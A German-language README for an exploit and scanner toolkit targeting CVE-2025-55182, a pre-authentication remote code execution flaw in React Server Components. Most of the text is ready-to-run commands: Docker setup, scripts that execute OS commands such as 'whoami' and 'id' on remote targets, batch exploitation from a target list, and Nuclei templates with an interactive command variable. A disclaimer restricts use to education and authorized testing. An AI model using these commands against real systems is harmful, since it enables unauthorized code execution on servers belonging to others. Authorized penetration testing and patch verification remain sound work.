
Scanner- und Exploit-Toolkit für CVE-2025-55182, eine kritische Pre-Auth-RCE in React Server Components. Enthält Erkennung, interaktive Shell, Docker-Bereitstellung und pädagogische technische Analyse.
Ein umfassendes Sicherheitstest-Toolkit für CVE-2025-55182, eine kritische, vorauthentifizierte Remote-Code-Ausführungsschwachstelle in React Server Components.
Möchten Sie diese Schwachstelle zu 100% verstehen?
📖 Lesen Sie unsere vollständige technische Analyse – Alles, was Sie wissen müssen:
- Warum React auf dem Server läuft (nicht nur im Browser!)
- Wie der Angriff mit visuellen Diagrammen funktioniert
- Jede Zeile des Exploits erklärt
- Von Anfängerkonzepten bis zur fortgeschrittenen Ausnutzung
- Keine Vorkenntnisse erforderlich!
Perfekt für: Sicherheitsberichte, Schulungsmaterialien, Bedrohungsanalyse oder einfach zum Lernen!
Diese Schwachstelle betrifft React Server Components Versionen 19.0.0 bis 19.2.0, mit Auswirkungen auf:
react-server-dom-parcelreact-server-dom-turbopackreact-server-dom-webpackAuswirkung: Nicht authentifizierte Angreifer können durch unsichere Deserialisierung von HTTP-Anfrage-Payloads an Server-Function-Endpunkte beliebigen Code remote ausführen.
👉 Lesen Sie die vollständige technische Analyse – Ein umfassender Leitfaden mit:
Perfekt für:
Keine Vorkenntnisse erforderlich – beginnt mit Grundlagen und baut bis zu fortgeschrittenen Ausnutzungstechniken auf!
NUR FÜR BILDUNGSZWECKE UND AUTORISIERTE SICHERHEITSTESTS
Dieses Tool ist ausschließlich bestimmt für:
Warnung: Unbefugter Zugriff auf Computersysteme ist illegal. Benutzer sind für die Einhaltung aller geltenden Gesetze und Vorschriften verantwortlich. Die Autoren übernehmen keine Haftung für Missbrauch dieses Tools.
Keine Abhängigkeiten erforderlich! Ein einziges Bash-Skript für schnelle Tests.
👉 EXPLOIT_SCRIPT.md – Eigenständiges Skript, das:
# Einzelnes Ziel
./exploit-cve-2025-55182.sh http://target.com
# Mehrere Ziele
./exploit-cve-2025-55182.sh -f targets.txt
Komplettes Toolkit mit Docker, Web-UI und Nuclei-Integration. Lesen Sie unten weiter für die Installation.
| Funktion | Beschreibung |
|---|---|
| 🐳 Docker-Unterstützung | Ein-Befehl-Bereitstellung mit Docker Compose |
| 🌐 Web-Oberfläche | Benutzerfreundliche Web-UI für nicht-technische Benutzer |
| 🔍 Angreifbare Testumgebung | Starten Sie eine lokale angreifbare App für sichere Tests |
| 🎯 Fern-Scanning | Testen Sie externe Ziele auf Schwachstellen |
| ⚡ Interaktive Shell | Führen Sie OS-Befehle aus und sehen Sie Ergebnisse in Echtzeit |
| 📊 Mehrere Scan-Modi | Nur-Erkennung oder vollständige Ausnutzung |
| 📝 Detaillierte Berichte | JSON- und Textausgabeformate |
| 🔧 Nuclei-Integration | Nutzen Sie den leistungsstarken Scanner von ProjectDiscovery |
Wählen Sie Ihre Installationsmethode:
# Repository klonen
git clone https://github.com/StealthMoud/CVE-2025-55182-Scanner.git
cd CVE-2025-55182-Scanner
# Scanner starten
docker compose up
# Web-Oberfläche unter http://localhost:3001 aufrufen
# Repository klonen
git clone https://github.com/StealthMoud/CVE-2025-55182-Scanner.git
cd CVE-2025-55182-Scanner
# Nuclei installieren (macOS)
brew install nuclei
# Skripte ausführbar machen
chmod +x scripts/*.sh
📖 Detaillierte Einrichtung: Siehe SETUP_GUIDE.md für Schritt-für-Schritt-Anleitungen
⚡ Kurzreferenz: Siehe QUICKSTART.md für häufige Anwendungsfälle
Web-Oberfläche starten:
docker compose up
# Browser öffnen: http://localhost:3001
Mit angreifbarer Test-App starten:
docker compose --profile with-vulnerable-app up
# Scanner: http://localhost:3001
# Angreifbare App: http://localhost:3000
Wichtig für Docker-Benutzer: Beim Scannen aus Docker heraus verwenden Sie:
http://host.docker.internal:3000 zum Scannen von Apps auf Ihrem Host-Rechnerhttp://vulnerable-app:3000 zum Scannen der containerisierten angreifbaren Apphttps://example.com für externe Zielehttp://localhost:3001Erstellen und testen Sie gegen eine lokale angreifbare App:
# Terminal 1: Angreifbare App starten
./scripts/setup-vulnerable-app.sh
# App läuft auf http://localhost:3000
# Terminal 2: Testen
./scripts/test-local.sh
# Benutzerdefinierte Befehle ausführen
./scripts/test-local.sh "whoami"
./scripts/test-local.sh "pwd"
./scripts/test-local.sh "ls -la"
# Basis-Scan
./scripts/test-remote.sh https://target.com
# Mit Befehlsausführung
./scripts/test-remote.sh https://target.com "id"
# Zieldatei erstellen
cat > targets.txt << EOF
https://target1.com
https://target2.com
https://target3.com
EOF
# Alle Ziele scannen
./scripts/test-multiple.sh targets.txt
Grundlegende Schwachstellenerkennung:
nuclei -t templates/cve-2025-55182.yaml -u http://localhost:3000 -v
Benutzerdefinierte Befehle ausführen:
nuclei -t templates/cve-2025-55182-interactive.yaml \
-u http://localhost:3000 \
-var cmd="whoami" \
-v
Mehrere Ziele scannen:
nuclei -t templates/cve-2025-55182.yaml -l targets.txt -v